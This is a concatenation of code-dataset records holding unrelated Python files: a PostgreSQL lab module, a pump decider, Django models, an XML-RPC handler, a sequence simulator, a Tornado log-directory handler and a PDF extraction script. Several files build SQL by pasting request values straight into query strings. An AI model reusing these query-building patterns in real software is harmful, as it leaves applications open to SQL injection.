pk = inspector.get_pk_constraint(table_name, schema=schema)\r\n pk = str(pk['constrained_columns']).strip('[]\\'')\r\n d = dict()\r\n d['__tablename__'] = table_name\r\n for column in inspector.get_columns(table_name, schema=schema):\r\n print(str(column['type']))\r\n if str(column['type']) == 'DATE':\r\n d[column['name']] = Column(MyFancyType)\r\n attributes.append([str(column['name']), str('Date')])\r\n continue\r\n attributes.append([str(column['name']), str(column['type'])])\r\n if column['name'] == pk and column['name'] in fk:\r\n d[column['name']] = Column(ForeignKey(fk[column['name']]), type_=column['type'],\r\n nullable=column['nullable'], primary_key=True)\r\n elif str(column['name']) == pk:\r\n d[column['name']] = Column(type_=column['type'], nullable=column['nullable'], primary_key=True)\r\n elif column['name'] in fk:\r\n d[column['name']] = Column(ForeignKey(fk[column['name']]), type_=column['type'],\r\n nullable=column['nullable'])\r\n else:\r\n d[column['name']] = Column(type_=column['type'], nullable=column['nullable'])\r\n Test = type('Test', (Base,), d)\r\n return Test, table_name, pk, attributes\r\n\r\n\r\ndef insert(model, session, work_table, primary_key, attributes, data):\r\n d_ = dict()\r\n for iter, x in enumerate(attributes):\r\n if x[0] != primary_key:\r\n d_[x[0]] = data[iter]\r\n str_req = str(insert_(model).values(d_).compile(compile_kwargs={\"literal_binds\": True}))\r\n session.rollback()\r\n return str_req\r\n\r\n\r\ndef update(model, session, work_table, primary_key, attributes, data):\r\n d_ = dict()\r\n for iter, x in enumerate(attributes):\r\n d_[x[0]] = data[iter]\r\n str_req = str(update_(model).where(text(str(primary_key) + \"=\" + str(d_.pop(primary_key)))).values(d_).compile(\r\n compile_kwargs={\"literal_binds\": True}))\r\n session.rollback()\r\n return str_req\r\n\r\n\r\ndef delete(model, session, work_table, primary_key, todel):\r\n str_req = str(\r\n delete_(model).where(text(str(primary_key) + \"=\" + str(todel))).compile(compile_kwargs={\"literal_binds\": True}))\r\n session.rollback()\r\n return str_req\r\n\r\n\r\ndef insert_random(work_table, primary_key, attributes, num):\r\n # INSERT INTO public.\"Users\" (user_login, user_password, user_data) (\r\n # SELECT user_login, user_password, user_data\r\n # FROM (\r\n # SELECT (\r\n # SELECT array_to_string(ARRAY(SELECT chr((ascii('a') + round(random() * 25))::integer)\r\n # FROM generate_series(3, (random()*10)::integer + 3 + (generator*0))), '') as user_login\r\n # ) , (\r\n # SELECT md5((random()+ (generator*0))::text) as user_password\r\n # ) , (\r\n # SELECT timestamp '2019-02-10' + random() * (timestamp '2019-04-20' - timestamp '2019-02-10') as user_data\r\n # )\r\n # FROM generate_series(1,num) as generator\r\n # ) dont_argh_on_me_postgresql\r\n # ) ON CONFLICT DO NOTHING;\r\n\r\n req = \"INSERT INTO public.\\\"\" + str(work_table) + \"\\\" (\"\r\n # tag_id, ques_id\r\n added = False\r\n for i in range(0, len(attributes)):\r\n if attributes[i][0] == primary_key:\r\n continue\r\n if added:\r\n req += \", \"\r\n req += attributes[i][0]\r\n added = True\r\n req += \") ( SELECT \"\r\n # tag_id, ques_id, test\r\n added = False\r\n for i in range(0, len(attributes)):\r\n if attributes[i][0] == primary_key:\r\n continue\r\n if added:\r\n req += \", \"\r\n req += attributes[i][0]\r\n added = True\r\n req += \" FROM ( SELECT \"\r\n added = False\r\n for i in range(0, len(attributes)):\r\n if attributes[i][0] == primary_key:\r\n continue\r\n if added:\r\n req += \", \"\r\n req += \"(\"\r\n if attributes[i][1] == \"INTEGER\":\r\n req += \"SELECT 1+RANDOM()*100::int + (generator*0) as \" + str(attributes[i][0]) + \" \"\r\n elif attributes[i][1] == \"TEXT\" and attributes[i][0].find(\"password\") != -1:\r\n req += \"SELECT md5((random()+ (generator*0))::text) as \" + str(attributes[i][0]) + \" \"\r\n elif attributes[i][1] == \"TEXT\" and attributes[i][0].find(\"login\") != -1:\r\n req += \"SELECT array_to_string(ARRAY(SELECT chr((ascii('a') + round(random() * 25))::integer) \" \\\r\n \"FROM generate_series(3, (random()*10)::integer + 3 + (generator*0))), '') as \" + str(\r\n attributes[i][0]) + \" \"\r\n elif attributes[i][1] == \"CHAR(256)\" or attributes[i][1] == \"TEXT\":\r\n req += \"SELECT string_agg(substr(characters, (random() * length(characters) + 1 + (generator*0))::integer, 1), '') as \" + str(\r\n attributes[i][0])\r\n req += \" from (values('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 ')) as symbols(characters) \" \\\r\n \"join generate_series(1, 100+ (generator*0)) on 1 = 1 \"\r\n elif attributes[i][1] == \"Date\":\r\n req += \"SELECT timestamp '2019-02-10' + (random()+ (generator*0)) * (timestamp '2019-04-20' - timestamp '2019-02-10') as \" + str(\r\n attributes[i][0])\r\n req += \") \"\r\n added = True\r\n req += \"FROM generate_series(1,\" + str(\r\n num) + \") as generator ) dont_argh_on_me_postgresql ) ON CONFLICT DO NOTHING;\"\r\n return req\r\n\r\n\r\ndef select_complex(first, end, s_str):\r\n req = \"SELECT ques_text, ques_date, public.\\\"Users\\\".user_login, public.\\\"Answers\\\".answ_text, \" \\\r\n \" public.\\\"Answers\\\".answ_date, avg\" \\\r\n \" FROM public.\\\"Questions\\\"\" \\\r\n \" LEFT JOIN public.\\\"Answers\\\" ON public.\\\"Answers\\\".ques_id = public.\\\"Questions\\\".ques_id\" \\\r\n \" LEFT JOIN public.\\\"Users\\\" ON public.\\\"Answers\\\".user_id = public.\\\"Users\\\".user_id\" \\\r\n \" LEFT JOIN (SELECT answ_id, avg(rate_rate) FROM public.\\\"Rating\\\" GROUP BY answ_id) mq ON public.\\\"Answers\\\".answ_id=mq.answ_id\" \\\r\n \" WHERE avg BETWEEN \" + str(first) + \" AND \" + str(end) + \"AND public.\\\"Answers\\\".answ_text LIKE '%\" + s_str[\r\n 0] + \"%'\"\r\n for i in range(1, len(s_str)):\r\n req += \"OR public.\\\"Answers\\\".answ_text LIKE '%\" + s_str[i] + \"%'\"\r\n req += \";\"\r\n return req\r\n\r\n\r\ndef select_fts_phrase(work_table, primary_key, attributes, search_string):\r\n # SELECT ques_id, ques_text FROM public.\"Questions\"\r\n # WHERE to_tsvector(ques_text) @@ phraseto_tsquery('to go')\r\n\r\n req = \"SELECT \" + primary_key + \", \"\r\n added = False\r\n for i in range(0, len(attributes)):\r\n if attributes[i][1] == \"TEXT\":\r\n if added:\r\n req += \", \"\r\n req += attributes[i][0]\r\n added = True\r\n req += \" FROM public.\\\"\" + work_table + \"\\\" WHERE to_tsvector(\"\r\n if len(search_string.split(\" \")) < 2:\r\n print(\"phrase is more that 2 word\")\r\n return\r\n for i in range(0, len(attributes)):\r\n if attributes[i][1] == \"TEXT\":\r\n req += attributes[i][0]\r\n req += \") @@ phraseto_tsquery('\" + search_string + \"');\"\r\n return req\r\n\r\n\r\ndef select_fts_word(work_table, primary_key, attributes, search_string):\r\n # SELECT ques_id, ques_text FROM public. \"Questions\" WHERE ques_text::tsvector @@ '! not'::tsquery\r\n\r\n req = \"SELECT \" + primary_key + \", \"\r\n added = False\r\n for i in range(0, len(attributes)):\r\n if attributes[i][1] == \"TEXT\":\r\n if added:\r\n req += \", \"\r\n req += attributes[i][0]\r\n added = True\r\n req += \" FROM public.\\\"\" + work_table + \"\\\" WHERE \"\r\n search_string = search_string.strip()\r\n ss = search_string.split(\" \")\r\n if len(ss) > 2:\r\n print(\"WORD\")\r\n return\r\n for i in range(0, len(attributes)):\r\n if attributes[i][1] == \"TEXT\":\r\n req += attributes[i][0]\r\n req += \"::tsvector @@ '! \" + search_string + \"'::tsquery;\"\r\n return req\r\n\r\n\r\ndef select_data(model, session, work_table, primary_key):\r\n # str_req = str(session.query(model).order_by(str(primary_key)).statement.compile(compile_kwargs={\"literal_binds\": True}))\r\n str_req = str(select_([model]).order_by(str(primary_key)).compile(compile_kwargs={\"literal_binds\": True}))\r\n session.rollback()\r\n return str_req\r\n\r\n\r\ndef execute_and_print(connection, cursor, req):\r\n try:\r\n cursor.execute(req)\r\n connection.commit()\r\n result = cursor.fetchall()\r\n return result\r\n except psycopg2.Error as error:\r\n if str(error) == 'no results to fetch':\r\n print(\"REQUEST SUCCESSFUL\")\r\n input()\r\n return \"OK\"\r\n else:\r\n print(\"ERROR:\", error)\r\n input()\r\n return \"\"\r\n","sub_path":"lab3/mvc.py","file_name":"mvc.py","file_ext":"py","file_size_in_byte":10296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"586852917","text":"\"\"\"\nEncapsulates decision making in the water-regulation module\n\"\"\"\n\n\nclass Decider():\n \"\"\"\n Encapsulates decision making in the water-regulation module\n \"\"\"\n\n def __init__(self, target_height, margin):\n \"\"\"\n Create a new decider instance for this tank.\n\n :param target_height: the target height for liquid in this tank\n :param margin: the margin of liquid above and below the target height for\n which the pump should not turn on. Ex: .05 represents a\n 5% margin above and below the target_height.\n \"\"\"\n self.target_height = target_height\n self.margin = margin\n self.upper = target_height + margin\n self.lower = target_height - margin\n\n\n def height_checker(self, cur_height):\n \"\"\"\n Checks current height to target height\n returns int whether current height is below, between, or above target height\n \"\"\"\n\n above = 2\n good = 1\n below = 0\n\n if cur_height < self.lower:\n return below\n if cur_height > self.upper:\n return above\n return good\n\n @staticmethod\n def decide_pump_action(current_action, actions):\n \"\"\"\n Closer function that returns an action based on the current status of pump and water level.\n \"\"\"\n\n def decide_level(current_height):\n \n if current_action == -1:\n if current_height == 0:\n return actions['PUMP_OFF']#PUMP_OUT and below\n return actions['PUMP_OUT'] #PUMP_OUT and in between or level or above level\n if current_action == 0: \n if current_height == 0:\n return actions['PUMP_IN']#PUMP_OFF and below\n if current_height == 2:\n return actions['PUMP_OUT'] #PUMP_OFF and above level\n return actions['PUMP_OFF'] #PUMP_OFF and in between level\n if current_action == 1:\n if current_height == 2:\n return actions['PUMP_OFF']#PUMP_IN and above\n return actions['PUMP_IN'] #PUMP_IN and either in between level or below min level\n\n return decide_level\n","sub_path":"students/SeanTasaki/Lesson06/water-regulation/waterregulation/decider.py","file_name":"decider.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"417874024","text":"from django.db import models\r\nfrom django.contrib.auth.models import AbstractUser\r\nfrom django.utils import timezone\r\n\r\n\r\nclass User(AbstractUser):\r\n gender_choice = (\r\n (0, '男'),\r\n (1, '女'),\r\n )\r\n occupation_choice = (\r\n ('administrator', '管理员'),\r\n ('artist', '艺术家'),\r\n ('educator', '教育家'),\r\n ('engineer', '工程师'),\r\n ('entertainment', '娱乐'),\r\n ('executive', '行政人员'),\r\n ('healthcare', '卫生保健'),\r\n ('homemaker', '家庭主妇'),\r\n ('lawyer', '律师'),\r\n ('librarian', '图书管理员'),\r\n ('marketing', '营销'),\r\n ('programmer', '程序员'),\r\n ('salesman', '推销员'),\r\n ('scientist', '科学家'),\r\n ('student', '学生'),\r\n ('technician', '技术员'),\r\n ('writer', '作家'),\r\n ('retired', '退休'),\r\n ('none', '自由人'),\r\n ('other', '其他'),\r\n )\r\n gender = models.BooleanField(choices=gender_choice, blank=True, default=0)\r\n email = models.EmailField('邮箱', unique=True, error_messages={'unique': \"该邮箱已被注册!\"})\r\n date_born = models.DateField(blank=True, default='1990-01-01')\r\n occupation = models.CharField(max_length=50, choices=occupation_choice, blank=True, default='other')\r\n is_newcomer = models.BooleanField(default=True)\r\n\r\n\r\nclass Movie(models.Model):\r\n title = models.CharField(max_length=150, blank=True)\r\n release_date = models.DateField(blank=True)\r\n genre = models.CharField(max_length=20, blank=True)\r\n imdb_url = models.URLField(blank=True)\r\n poster_url = models.URLField(blank=True)\r\n is_newcomer = models.BooleanField(default=True)\r\n\r\n\r\n#两个id外键分别是usr和movie\r\nclass Rating(models.Model):\r\n user_id = models.ForeignKey(User, on_delete=models.CASCADE)\r\n movie_id = models.ForeignKey(Movie, on_delete=models.CASCADE)\r\n rating = models.IntegerField(blank=True)\r\n eval_time = models.DateTimeField(default=timezone.now)\r\n\r\n\r\n","sub_path":"MovieRecommendGCMC/movierecommend/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"117329034","text":"import MySQLdb\n\ndb = MySQLdb.connect(\"localhost\", \"root\", '123456', \"python\")\ncursor = db.cursor()\n\ntry:\n sql = \"INSERT INTO SACH(NAME) VALUES ('CNTT')\"\n\n sql_update = \"UPDATE SACH SET NAME='%s'\" % 'TiengAnh'\n cursor.execute(sql)\n db.commit()\nexcept Exception as ex:\n print(ex)\n db.rollback()\ndb.close()\n\n# # execute SQL query using execute() method.\n# cursor.execute(\"SELECT * FROM SACH\")\n#\n# # Fetch a single row using fetchone() method.\n# data = cursor.fetchone()\n# print(data)\n","sub_path":"Bai2/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"332178506","text":"# Created by zhouwang on 2018/5/17.\n\nfrom .base import BaseRequestHandler, permission\nimport datetime\nimport os\n\ndef check_argements(handler, pk=None):\n error = {}\n path = os.path.join(handler.get_argument('path', ''), '')\n comment = handler.get_argument('comment', '')\n if not path:\n error['path'] = '目录路径是必填项'\n elif not os.path.exists(path):\n error['path'] = '目录路径[本地]不存在'\n elif not os.path.isdir(path):\n error['path'] = '路径不是一个目录'\n else:\n select_sql = 'SELECT id FROM local_log_dir WHERE path=\"%s\" %s' % (path, 'and id!=\"%d\"' % pk if pk else '')\n count = handler.mysqldb_cursor.execute(select_sql)\n if count:\n error['path'] = '目录路径已存在'\n if not comment:\n error['comment'] = '备注是必填项'\n request_data = {\n 'path':path,\n 'comment':comment\n }\n return error, request_data\n\n\ndef add_valid(func):\n def _wrapper(self):\n error, self.reqdata = check_argements(self)\n if error:\n return {'code': 400, 'msg': 'Bad POST data', 'error': error}\n return func(self)\n return _wrapper\n\n\ndef query_valid(func):\n def _wrapper(self, pk):\n error = {}\n if not pk and self.request.arguments:\n argument_keys = self.request.arguments.keys()\n query_keys = ['id', 'path', 'comment', 'create_time']\n error = {key:'参数不可用' for key in argument_keys if key not in query_keys}\n if error:\n return {'code': 400, 'msg': 'Bad GET param', 'error': error}\n return func(self, pk)\n return _wrapper\n\n\ndef update_valid(func):\n def _wrapper(self, pk):\n select_sql = 'SELECT id FROM local_log_dir WHERE id=\"%d\"' % pk\n count = self.mysqldb_cursor.execute(select_sql)\n if not count:\n return {'code': 404, 'msg': 'Update row not found'}\n error, self.reqdata = check_argements(self, pk)\n if error:\n return {'code': 400, 'msg': 'Bad PUT param', 'error': error}\n return func(self, pk)\n return _wrapper\n\n\ndef del_valid(func):\n def _wrapper(self, pk):\n select_sql = 'SELECT id FROM local_log_dir WHERE id=\"%d\"' % pk\n count = self.mysqldb_cursor.execute(select_sql)\n if not count:\n return {'code': 404, 'msg': 'Delete row not found'}\n return func(self, pk)\n return _wrapper\n\n\nclass LocalLogDir():\n def __init__(self):\n self.reqdata = {}\n\n @add_valid\n def _add(self):\n insert_sql = 'INSERT INTO local_log_dir (path, create_time, comment) VALUES (\"%s\", \"%s\", \"%s\")' % \\\n (self.reqdata['path'], datetime.datetime.now().strftime('%Y-%m-%d %H:%M'),\n self.reqdata['comment'],)\n try:\n self.mysqldb_cursor.execute(insert_sql)\n self.mysqldb_conn.commit()\n except Exception as e:\n self.mysqldb_conn.rollback()\n return {'code': 500, 'msg': 'Add failed, %s' % str(e)}\n else:\n self.mysqldb_cursor.execute('SELECT LAST_INSERT_ID() as id')\n return {'code': 200, 'msg': 'Add successful', 'data': self.mysqldb_cursor.fetchall()}\n\n\n @query_valid\n def _query(self, pk):\n select_sql = '''\n SELECT\n id,\n path, \n date_format(create_time, \"%%Y-%%m-%%d %%H:%%i:%%s\") as create_time,\n comment \n FROM local_log_dir\n %s\n ''' % self.format_where_param(pk, self.request.arguments)\n self.mysqldb_cursor.execute(select_sql)\n results = self.mysqldb_cursor.fetchall()\n data = [dict(result, **{'nodes':self._nodes(result['path']) if os.path.isdir(result['path']) else [] }) for result in results]\n return {'code': 200, 'msg': 'Query successful', 'data': data}\n\n\n @update_valid\n def _update(self, pk):\n update_sql = 'UPDATE local_log_dir SET path=\"%s\", comment=\"%s\" WHERE id=\"%d\"' % \\\n (self.reqdata['path'], self.reqdata['comment'], pk)\n try:\n self.mysqldb_cursor.execute(update_sql)\n self.mysqldb_conn.commit()\n except Exception as e:\n self.mysqldb_conn.rollback()\n return {'code': 500, 'msg': 'Update failed, %s' % str(e)}\n else:\n return {'code': 200, 'msg': 'Update successful', 'data': {'id': pk}}\n\n\n @del_valid\n def _del(self, pk):\n delete_sql = 'DELETE FROM local_log_dir WHERE id=\"%d\"' % pk\n try:\n self.mysqldb_cursor.execute(delete_sql)\n self.mysqldb_conn.commit()\n except Exception as e:\n self.mysqldb_conn.rollback()\n return {'code': 500, 'msg': 'Delete failed, %s' % str(e)}\n else:\n return {'code': 200, 'msg': 'Delete successful'}\n\n\n def _nodes(self, path):\n results = []\n list_names = os.listdir(path)\n for name in list_names:\n next_path = os.path.join(path, name)\n if os.path.isdir(next_path):\n results.append({'text': name, 'nodes': self._nodes(next_path)})\n else:\n results.append({'text': name})\n return results\n\n\n\nclass Handler(BaseRequestHandler, LocalLogDir):\n '''\n 本地日志目录 Handler\n '''\n @permission(role=2)\n def post(self):\n response_data = self._add()\n self._write(response_data)\n\n @permission(role=2)\n def put(self, pk=0):\n response_data = self._update(int(pk))\n self._write(response_data)\n\n @permission(role=2)\n def delete(self, pk=0):\n response_data = self._del(int(pk))\n self._write(response_data)\n\n @permission()\n def get(self, pk=0):\n response_data = self._query(int(pk))\n self._write(response_data)","sub_path":"handlers/local_log_dir.py","file_name":"local_log_dir.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"248375939","text":"import subprocess # 在python 中背景地跑shell 指令\nimport re # regular expression 的library\nimport sys\nimport json # 資料格式json 的library\nimport threading # 多線程平行化處理用\nfrom functools import reduce\n\ndef main():\n extract_catalog() # 將目錄部份轉成純文字檔儲存\n indexes = extract_indexes() # 將目錄的項目和對應頁數擷取出來\n biographies = set_biographies_schema(indexes) # 幫每個人物傳記做一個key-value形式的檔案型資料庫\n biographies_s = divide_n_parts(biographies, 4) # 切成n等分以便作平行化處理\n \n # Output\n output(biographies_s)\n \ndef extract_catalog():\n # 如同在shell, 命令pdfbox 將 社會與文化篇.pdf 的3~9頁轉成純文字檔儲存\n # subprocess.run 的參數是 list of strings without space\n subprocess.run('java -jar ./Tools/pdfbox-app-1.8.13.jar ExtractText -startPage 3 -endPage 9 ./DataBase/社會與文化篇.pdf ./DataBase/tmp/index.txt'.split()) # \n\ndef extract_indexes():\n with open('./DataBase/tmp/index.txt', 'r') as f:\n index_text = f.read()\n\n match_pairs = re.findall(r'^(\\w+ ?\\w+) ? ?\\.+ (\\d\\d\\d)$', index_text, re.MULTILINE)\n # return [(\"項目\",\"起始頁數\"), (\"項目\",\"起始頁數\"),... . ]\n match_pairs = list(filter(lambda pair: 5 <= int(pair[1]) <= 361, match_pairs)) # 抓的index限制在其起始頁數在5~361之間\n match_pairs.append((\"第假章 最後墊底用\", \"363\"))\n\n return match_pairs\n\ndef set_biographies_schema(indexPair_s):\n biographies = []\n category = \"\" # 目前所在的類別 e.g.教育學術\n for (i, indexPair) in enumerate(indexPair_s):\n item, startPage = indexPair\n\n if re.fullmatch(r'^第\\w章 \\w+$', item): # 若此index的項目是類別\n category = item[4:]\n else: # 否則此index的項目就是人物\n name = item.replace(\" \",\"\") # 二字人名在目錄中會有全形空格在中間\n \n biography = {\n \"Name\" : name,\n \"Alias_s\" : [],\n # PDF、傳記相關\n \"Category\" : category,\n \"StartPage\" : int(startPage),\n \"EndPage\" : int(indexPair_s[i+1][1]) - 1, # 這個傳記的結尾頁數是下一個傳記的開頭頁數再減1\n \"Authors\" : [],\n \"Notes\" : \"\",\n \"Footnotes\" : [],\n # Summary\n \"Locations\" : [],\n \"Identities\" : [],\n \"ChronologicalTable\" : [],\n # 基本資訊\n \"Birth\" : \"\",\n \"Death\" : \"\",\n \"BirthPlace\" : \"\",\n \"Hometown\" : \"\"\n }\n biographies.append(biography)\n\n return biographies\n\ndef divide_n_parts(lst, n):\n return [lst[i::n] for i in range(n)]\n\n # [startIndex : endIndex : skip]\n\n # Example:\n # Divide [0, 1, 2, 3, 4, 5, 6, 7, 8 ,9, 10, 11, 12] into 3 parts\n # -> [[0, 3, 6, 9, 12], [1, 4, 7, 10], [2, 5, 8, 11]]\n\ndef output(biographies_s):\n all_biographies = reduce(lambda x,y: x + y, biographies_s) # 分開的part再次結合成一體,也就是list of 所有傳記\n\n threads = []\n # 為n個部分的傳記s各設一個thread來轉換並輸出txt檔\n for part_biographies in biographies_s:\n thread = threading.Thread(target=output_txts, args=[part_biographies])\n threads.append(thread)\n # 輸出所有傳記的資料庫(json形式保存)這項工作自己一個thread\n thread = threading.Thread(target=output_metaDatas, args=[all_biographies])\n threads.append(thread)\n\n # 讓所有thread開始跑\n for thread in threads:\n thread.start()\n\n # 所有thread都執行完畢後才讓你往下\n for thread in threads:\n thread.join()\n\n\ndef output_txts(biographies):\n for biography in biographies:\n name = biography[\"Name\"]\n # 從目錄掃出來的是字串,要轉成數字 # +20 是因為市誌一開始從羅馬數字開始,市誌第1頁其實是pdf的第21頁\n startPage = biography[\"StartPage\"] + 20 \n endPage = biography[\"EndPage\"] + 20\n\n command = 'java -jar ./Tools/pdfbox-app-1.8.13.jar ExtractText -startPage {} -endPage {} ./DataBase/社會與文化篇.pdf ./DataBase/raw_txt/{}-{}.txt'.format(str(startPage), str(endPage), str(biography[\"StartPage\"]), name)\n subprocess.run(command.split() )\n\ndef output_metaDatas(biographies):\n for biography in biographies:\n with open('./DataBase/metaData/{}-{}.json'.format(str(biography[\"StartPage\"]), biography[\"Name\"]), 'w') as f:\n json.dump(biography, f) # 把biography(dict type) 變成json 檔案儲存\n \nif __name__ == \"__main__\":\n main()\n \n","sub_path":"ConvertAndExtract.py","file_name":"ConvertAndExtract.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"331507503","text":"# coding: utf-8\nimport xml\n\nfrom django.http.response import HttpResponse\nfrom six.moves import xmlrpc_client\n\nfrom modernrpc.conf import settings\nfrom modernrpc.core import XMLRPC_PROTOCOL\nfrom modernrpc.exceptions import RPCParseError, RPCInvalidRequest, RPCInternalError\nfrom modernrpc.handlers.base import RPCHandler\n\n\nclass XMLRPCHandler(RPCHandler):\n\n protocol = XMLRPC_PROTOCOL\n\n def __init__(self, request, entry_point):\n super(XMLRPCHandler, self).__init__(request, entry_point)\n # Marshaller is used to dumps data into valid XML-RPC response. See self.dumps() for more info\n self.marshaller = xmlrpc_client.Marshaller(encoding=settings.MODERNRPC_XMLRPC_DEFAULT_ENCODING,\n allow_none=settings.MODERNRPC_XMLRPC_ALLOW_NONE)\n\n @staticmethod\n def valid_content_types():\n return [\n 'text/xml',\n ]\n\n def loads(self, str_data):\n try:\n try:\n # Python 3\n return xmlrpc_client.loads(str_data, use_builtin_types=settings.MODERNRPC_XMLRPC_USE_BUILTIN_TYPES)\n except TypeError:\n # Python 2\n return xmlrpc_client.loads(str_data, use_datetime=settings.MODERNRPC_XMLRPC_USE_BUILTIN_TYPES)\n\n except xml.parsers.expat.ExpatError as e:\n raise RPCParseError(e)\n\n except xmlrpc_client.ResponseError:\n raise RPCInvalidRequest('Bad XML-RPC payload')\n\n except Exception as e: # pragma: no cover\n raise RPCInvalidRequest(e)\n\n def dumps(self, obj):\n\n try:\n # Marshaller has a specific handling of Fault instance. It is given without modification\n if isinstance(obj, xmlrpc_client.Fault):\n return self.marshaller.dumps(obj)\n\n # xmlrpc_client.Marshaller expects a list of objects to dumps.\n # It will output a '' block and loops onto given objects to inject, for each one,\n # a 'X' block.\n # This is not the return defined in XML-RPC standard, see http://xmlrpc.scripting.com/spec.html:\n # \"The body of the response is a single XML structure, a , which can contain\n # a single which contains a single which contains a single .\"\n #\n # So, to make sure the return value always contain a single 'X',\n # we dumps it as an array of a single value.\n return self.marshaller.dumps([obj])\n\n except Exception as e:\n raise RPCInternalError('Unable to serialize result as valid XML: ' + str(e))\n\n def process_request(self):\n\n encoding = self.request.encoding or 'utf-8'\n data = self.request.body.decode(encoding)\n\n params, method_name = self.loads(data)\n\n if method_name is None:\n raise RPCInvalidRequest('Missing methodName')\n\n return self.execute_procedure(method_name, args=params)\n\n @staticmethod\n def xml_http_response(data, http_response_cls=HttpResponse):\n response = http_response_cls(data)\n response['Content-Type'] = 'text/xml'\n return response\n\n def result_success(self, data):\n\n raw_response = ''\n raw_response += ''\n raw_response += self.dumps(data)\n raw_response += ''\n\n return self.xml_http_response(raw_response)\n\n def result_error(self, exception, http_response_cls=HttpResponse):\n\n raw_response = ''\n raw_response += ''\n raw_response += self.dumps(xmlrpc_client.Fault(exception.code, exception.message))\n raw_response += ''\n\n return self.xml_http_response(raw_response, http_response_cls=http_response_cls)\n","sub_path":"modernrpc/handlers/xmlhandler.py","file_name":"xmlhandler.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"17405266","text":"import json\nimport math\nfrom data_parsing import MAX_AGE, MAX_HOURS\n\nwith open(\"weights.json\", \"r\") as file:\n\tWEIGHTS = json.load(file)\n\ndef predict(age: int, has_college_degree: bool, is_married: bool, is_male: bool,\n\tweekly_work_hours: int) -> float:\n\t'''\n\tPredicts whether a person makes at least 50k dollars a year or not.\n\t:returns: The probability that this person makes over 50k dollars.\n\t'''\n\n\t# We have to standardize my input data the same way we did when training the model.\n\tage = age / MAX_AGE\n\tweekly_work_hours = weekly_work_hours / MAX_HOURS\n\n\ts = (age*WEIGHTS[0] + has_college_degree*WEIGHTS[1] + is_married*WEIGHTS[2] +\n\t\t\tis_male*WEIGHTS[3] + weekly_work_hours*WEIGHTS[4] + WEIGHTS[5])\n\ta = sigmoid(s)\n\treturn a\n\n\ndef sigmoid(x):\n\treturn 1 / (1 + math.exp(-x))","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"565008273","text":"from __future__ import division, print_function, absolute_import\nfrom collections import defaultdict\nimport numpy as np\nfrom treetime import config as ttconf\nfrom .seq_utils import alphabets, profile_maps, alphabet_synonyms, seq2array, seq2prof\nfrom .gtr import GTR\nfrom .treeanc import TreeAnc\n\n\nclass SeqGen(TreeAnc):\n def __init__(self, *args, **kwargs):\n super(SeqGen, self).__init__(reduce_alignment=False, **kwargs)\n\n\n def sample_from_profile(self, p):\n cum_p = p.cumsum(axis=1).T\n prand = np.random.random(p.shape[0])\n seq = self.gtr.alphabet[np.argmax(cum_p>prand, axis=0)]\n return seq\n\n\n def evolve(self, root_seq=None):\n self.seq_len = self.gtr.seq_len\n if root_seq:\n self.tree.root.sequence = seq2array(root_seq)\n else:\n self.tree.root.sequence = self.sample_from_profile(self.gtr.Pi.T)\n\n for n in self.tree.get_nonterminals(order='preorder'):\n profile_p = seq2prof(n.sequence, self.gtr.profile_map)\n for c in n:\n profile = self.gtr.evolve(profile_p, c.branch_length)\n c.sequence = self.sample_from_profile(profile)\n self.make_reduced_alignment()\n\n for n in self.tree.find_clades():\n if n==self.tree.root:\n n.mutations=[]\n else:\n n.mutations = self.get_mutations(n)\n\n\n def get_aln(self, internal=False):\n from Bio import SeqRecord, Seq\n from Bio.Align import MultipleSeqAlignment\n\n tmp = []\n for n in self.tree.get_terminals():\n if n.is_terminal() or internal:\n tmp.append(SeqRecord.SeqRecord(id=n.name, name=n.name, description='', seq=Seq.Seq(''.join(n.sequence))))\n\n return MultipleSeqAlignment(tmp)\n\n\n","sub_path":"treetime/seqgen.py","file_name":"seqgen.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"16508389","text":"from typing import Any, Dict, List\nfrom argparse import ArgumentParser\nimport socket\nfrom chroma_feedback import helper, wording\nfrom .light import get_lights, process_lights\n\nARGS = None\n\n\ndef init(program : ArgumentParser) -> None:\n\tglobal ARGS\n\n\tif not ARGS:\n\t\tip = None\n\n\t\tif not helper.has_argument('--xiaomi-yeelight-ip'):\n\t\t\tip = discover_ips()\n\t\tif ip:\n\t\t\tprogram.add_argument('--xiaomi-yeelight-ip', default = ip)\n\t\telse:\n\t\t\tprogram.add_argument('--xiaomi-yeelight-ip', action = 'append', required = True)\n\tARGS = helper.get_first(program.parse_known_args())\n\n\ndef run(status : str) -> List[Dict[str, Any]]:\n\tlights = get_lights(ARGS.xiaomi_yeelight_ip)\n\n\tif not lights:\n\t\texit(wording.get('light_no') + wording.get('exclamation_mark'))\n\treturn process_lights(lights, status)\n\n\ndef discover_ips() -> List[str]:\n\tmessage =\\\n\t[\n\t\t'M-SEARCH * HTTP/1.1',\n\t\t'HOST: 239.255.255.250:1982',\n\t\t'MAN: \"ssdp:discover\"',\n\t\t'ST: wifi_bulb'\n\t]\n\tdiscovery = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\tdiscovery.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)\n\tdiscovery.settimeout(2)\n\tdiscovery.sendto('\\r\\n'.join(message).encode(), ('239.255.255.250', 1982))\n\tips = 